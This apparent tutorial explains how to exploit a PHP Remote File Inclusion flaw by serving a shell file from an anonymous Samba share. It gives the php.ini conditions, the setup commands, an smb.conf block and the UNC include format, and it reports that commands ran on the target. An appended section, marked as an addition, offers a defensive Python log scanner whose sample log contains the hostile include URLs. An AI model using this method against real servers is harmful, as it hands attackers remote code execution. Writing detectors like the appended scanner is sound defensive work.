Today we are going to exploit a Remote File Inclusion using a Samba share as our remote URL. Our first step is to create a share on the Samba server containing our shell file. For this to work, two options need to be set in php.ini.
The two PHP settings 'allow_url_fopen' and 'allow_url_include' must both be set to 'On' before this will work.
Setting up Remote Samba Share
Here we set up the directory which will house our shell code.

    root@asus:~% mkdir /home/sam/public_html/pub
    root@asus:~% chmod 0555 /home/sam/public_html/pub
    root@asus:~% chown -R nobody:nogroup /home/sam/public_html/pub/
    root@asus:~% cp shell.php /home/sam/public_html/pub/

Samba Configuration
Our next task is to include our config block in the smb.conf file.

    [share]
    path = /home/sam/public_html/pub/
    writable = no
    guest ok = yes
    guest only = yes
    read only = yes
    directory mode = 0555
    force user = nobody

Now we can restart the Samba server and we are good to go.

    root@asus:~% service smbd restart

Exploiting
Once we get the Samba server set up, we can go ahead and try to include our remote share URL. Our URL should be in the format of //host/path/to/share/file.php.
As you can see, we successfully included the remote Samba share into our webpage, where we are able to run commands.
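
From the defending side, the //host/path/to/share/file.php format shown above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original post: a small Python scanner that flags query parameters whose decoded value is a UNC-style path. The log lines are constructed, and the script names (index.php, search.php) and parameter names (page, q) are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Decoded value starts like //host/share/... or \\host\share\...
UNC_RE = re.compile(r'^[\\/]{2}[^\\/\s]+[\\/]+[^\\/\s]+')
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log; script and parameter names are hypothetical.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=//203.0.113.5/share/shell.php HTTP/1.1" 200 1024',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=%5C%5C203.0.113.5%5Cshare%5Cshell.php HTTP/1.1" 200 1024',
    '192.0.2.11 - - [01/Jan/2024:10:00:12 +0000] "GET /search.php?q=a//b HTTP/1.1" 200 300',
]

def unc_params(target):
    """Return [(name, value)] for query parameters whose decoded value is a UNC-style path."""
    hits = []
    query = target.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # second pass catches double-encoded slashes
        if UNC_RE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return [(line_number, client_ip, parameter, value)] for every suspicious request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        client = line.split(" ", 1)[0]
        for name, value in unc_params(match.group(1)):
            findings.append((lineno, client, name, value))
    return findings

if __name__ == "__main__":
    for lineno, client, name, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent {name}={value!r}")
```

A hit is worth correlating with outbound SMB connections from the web server around the same timestamp.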